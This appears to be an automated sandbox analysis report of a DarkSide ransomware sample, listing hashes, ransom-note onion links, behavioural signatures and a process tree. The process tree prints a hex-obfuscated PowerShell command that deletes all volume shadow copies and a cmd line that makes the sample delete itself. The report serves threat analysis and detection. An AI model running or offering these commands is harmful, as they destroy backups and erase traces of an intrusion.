Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
25-07-2024 01:44
Static task
static1
Behavioral task
behavioral1
Sample
LisectAVT_2403002C_159.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
LisectAVT_2403002C_159.exe
Resource
win10v2004-20240709-en
General
-
Target
LisectAVT_2403002C_159.exe
-
Size
75KB
-
MD5
82eab016732be7b8b8aa14f205ca69cf
-
SHA1
818f451044610b1805e4c515d2bf112718fc8125
-
SHA256
c2ee523bb90260218b88e7fe0b7ca0dee8c9042c863682619c542d4961ddb32e
-
SHA512
1b87a7b81c1841e6dff89224f386ff52bd752e124e8c1c68e480ba399446404ad29e92172731fccd93e8a89e61f5097c07c9d6e0f41d2131a96d317344343eea
-
SSDEEP
1536:Dx7Fu4/i6/P3rlckx5+R4VDZ5CRGCq2iW7z:F7FujwPblhx1DZ5yGCH
Malware Config
Extracted
C:\Users\Admin\README.cc85ebd3.TXT
darkside
http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF
http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Renames multiple (160) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\zfkiJzV.exe aspack_v212_v242 -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 3440 cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
zfkiJzV.exepid process 1680 zfkiJzV.exe -
Loads dropped DLL 2 IoCs
Processes:
LisectAVT_2403002C_159.exepid process 2548 LisectAVT_2403002C_159.exe 2548 LisectAVT_2403002C_159.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
LisectAVT_2403002C_159.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\cc85ebd3.BMP" LisectAVT_2403002C_159.exe Set value (str) \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\cc85ebd3.BMP" LisectAVT_2403002C_159.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
LisectAVT_2403002C_159.exepid process 2548 LisectAVT_2403002C_159.exe -
Drops file in Program Files directory 64 IoCs
Processes:
zfkiJzV.exedescription ioc process File opened for modification C:\Program Files (x86)\Windows Sidebar\sidebar.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SELFCERT.EXE zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe zfkiJzV.exe File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\xjc.exe zfkiJzV.exe File opened for modification C:\Program Files\Windows Journal\Journal.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE zfkiJzV.exe File opened for modification C:\Program Files\Java\jre7\bin\rmiregistry.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSOUC.EXE zfkiJzV.exe File opened for modification C:\Program Files\DVD Maker\DVDMaker.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateBroker.exe zfkiJzV.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Spades\shvlzm.exe zfkiJzV.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jre7\bin\javacpl.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler64.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe zfkiJzV.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jre7\bin\servertool.exe zfkiJzV.exe File opened for modification C:\Program Files\7-Zip\7z.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jre7\bin\ktab.exe zfkiJzV.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\chkrzm.exe zfkiJzV.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaire.exe zfkiJzV.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmid.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\GROOVEMN.EXE zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\INFOPATH.EXE zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Wordconv.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\GRAPH.EXE zfkiJzV.exe File opened for modification C:\Program Files\Java\jre7\bin\pack200.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jre7\bin\unpack200.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OIS.EXE zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SETLANG.EXE zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jre7\bin\orbd.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\ONELEV.EXE zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.EXE zfkiJzV.exe File opened for modification C:\Program Files\Windows Defender\MpCmdRun.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe zfkiJzV.exe File opened for modification C:\Program Files\7-Zip\Uninstall.exe zfkiJzV.exe File opened for modification C:\Program Files\Java\jre7\bin\ssvagent.exe zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PPTICO.EXE zfkiJzV.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\NAMECONTROLSERVER.EXE zfkiJzV.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
LisectAVT_2403002C_159.exezfkiJzV.execmd.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LisectAVT_2403002C_159.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zfkiJzV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies Control Panel 1 IoCs
Processes:
LisectAVT_2403002C_159.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Control Panel\Desktop\WallpaperStyle = "10" LisectAVT_2403002C_159.exe -
Modifies registry class 5 IoCs
Processes:
LisectAVT_2403002C_159.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\cc85ebd3 LisectAVT_2403002C_159.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cc85ebd3\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\cc85ebd3.ico" LisectAVT_2403002C_159.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cc85ebd3 LisectAVT_2403002C_159.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cc85ebd3\ = "cc85ebd3" LisectAVT_2403002C_159.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\cc85ebd3\DefaultIcon LisectAVT_2403002C_159.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exeLisectAVT_2403002C_159.exepid process 2884 powershell.exe 2548 LisectAVT_2403002C_159.exe 2548 LisectAVT_2403002C_159.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
LisectAVT_2403002C_159.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 2548 LisectAVT_2403002C_159.exe Token: SeSecurityPrivilege 2548 LisectAVT_2403002C_159.exe Token: SeTakeOwnershipPrivilege 2548 LisectAVT_2403002C_159.exe Token: SeLoadDriverPrivilege 2548 LisectAVT_2403002C_159.exe Token: SeSystemProfilePrivilege 2548 LisectAVT_2403002C_159.exe Token: SeSystemtimePrivilege 2548 LisectAVT_2403002C_159.exe Token: SeProfSingleProcessPrivilege 2548 LisectAVT_2403002C_159.exe Token: SeIncBasePriorityPrivilege 2548 LisectAVT_2403002C_159.exe Token: SeCreatePagefilePrivilege 2548 LisectAVT_2403002C_159.exe Token: SeBackupPrivilege 2548 LisectAVT_2403002C_159.exe Token: SeRestorePrivilege 2548 LisectAVT_2403002C_159.exe Token: SeShutdownPrivilege 2548 LisectAVT_2403002C_159.exe Token: SeDebugPrivilege 2548 LisectAVT_2403002C_159.exe Token: SeSystemEnvironmentPrivilege 2548 LisectAVT_2403002C_159.exe Token: SeRemoteShutdownPrivilege 2548 LisectAVT_2403002C_159.exe Token: SeUndockPrivilege 2548 LisectAVT_2403002C_159.exe Token: SeManageVolumePrivilege 2548 LisectAVT_2403002C_159.exe Token: 33 2548 LisectAVT_2403002C_159.exe Token: 34 2548 LisectAVT_2403002C_159.exe Token: 35 2548 LisectAVT_2403002C_159.exe Token: SeDebugPrivilege 2884 powershell.exe Token: SeBackupPrivilege 1288 vssvc.exe Token: SeRestorePrivilege 1288 vssvc.exe Token: SeAuditPrivilege 1288 vssvc.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
LisectAVT_2403002C_159.exezfkiJzV.exedescription pid process target process PID 2548 wrote to memory of 1680 2548 LisectAVT_2403002C_159.exe zfkiJzV.exe PID 2548 wrote to memory of 1680 2548 LisectAVT_2403002C_159.exe zfkiJzV.exe PID 2548 wrote to memory of 1680 2548 LisectAVT_2403002C_159.exe zfkiJzV.exe PID 2548 wrote to memory of 1680 2548 LisectAVT_2403002C_159.exe zfkiJzV.exe PID 1680 wrote to memory of 2096 1680 zfkiJzV.exe cmd.exe PID 1680 wrote to memory of 2096 1680 zfkiJzV.exe cmd.exe PID 1680 wrote to memory of 2096 1680 zfkiJzV.exe cmd.exe PID 1680 wrote to memory of 2096 1680 zfkiJzV.exe cmd.exe PID 2548 wrote to memory of 2884 2548 LisectAVT_2403002C_159.exe powershell.exe PID 2548 wrote to memory of 2884 2548 LisectAVT_2403002C_159.exe powershell.exe PID 2548 wrote to memory of 2884 2548 LisectAVT_2403002C_159.exe powershell.exe PID 2548 wrote to memory of 2884 2548 LisectAVT_2403002C_159.exe powershell.exe PID 2548 wrote to memory of 3440 2548 LisectAVT_2403002C_159.exe cmd.exe PID 2548 wrote to memory of 3440 2548 LisectAVT_2403002C_159.exe cmd.exe PID 2548 wrote to memory of 3440 2548 LisectAVT_2403002C_159.exe cmd.exe PID 2548 wrote to memory of 3440 2548 LisectAVT_2403002C_159.exe cmd.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002C_159.exe"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002C_159.exe"1⤵
- Loads dropped DLL
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Users\Admin\AppData\Local\Temp\zfkiJzV.exeC:\Users\Admin\AppData\Local\Temp\zfkiJzV.exe2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1cfb52cc.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:2096
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\LISECT~1.EXE >> NUL2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:3440
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1288
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1VX38S3F\k2[1].rar
Filesize4B
MD5d3b07384d113edec49eaa6238ad5ff00
SHA1f1d2d2f924e986ac86fdf7b36c94bcdf32beec15
SHA256b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c
SHA5120cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6
-
Filesize
4B
MD520879c987e2f9a916e578386d499f629
SHA1c7b33ddcc42361fdb847036fc07e880b81935d5d
SHA2569f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31
SHA512bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f
-
Filesize
189B
MD5233054bcc24a8b60520018df6995c0b6
SHA1e2d57927bf4cd1dfe32db8ae97dd1522fc34ef76
SHA25664af832ccf75b452a140cb614a9adacf648a4c9cb41708772b980e72c0d322da
SHA512ed141d36130f2c9af0472aa0c702ed4447495b6c178078138c9bca9c11581800280ed5f7bfd113692ba5f339f4560683d005e5a5857bdf28d48d3ab7b1cc41a1
-
Filesize
15KB
MD5f7d21de5c4e81341eccd280c11ddcc9a
SHA1d4e9ef10d7685d491583c6fa93ae5d9105d815bd
SHA2564485df22c627fa0bb899d79aa6ff29bc5be1dbc3caa2b7a490809338d54b7794
SHA512e4553b86b083996038bacfb979ad0b86f578f95185d8efac34a77f6cc73e491d4f70e1449bbc9eb1d62f430800c1574101b270e1cb0eeed43a83049a79b636a3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD512cfb791d697af200bec3f94f3588c2c
SHA19b8a6b3c1cbc37c980eaa1249025218dfefe156b
SHA256a37590728d471e8a553b69e054ecbcaca5f3f25c6909a45eaf2d7b2d7f03a5e1
SHA512a1971f2e9b2d348ff9dba0acb6e02a8206f69f2cc3d395ad16ddfa51b138b552c46abc1df70300d0a40b79285cddf81342fd0f0784aca0831c4201f9ae2a5a94
-
Filesize
3KB
MD5b58e2411168bbdbec635cf4001635db0
SHA1c130cd9caaaa514a6b98c1168e10d44a989d191a
SHA256652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a
SHA51287e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a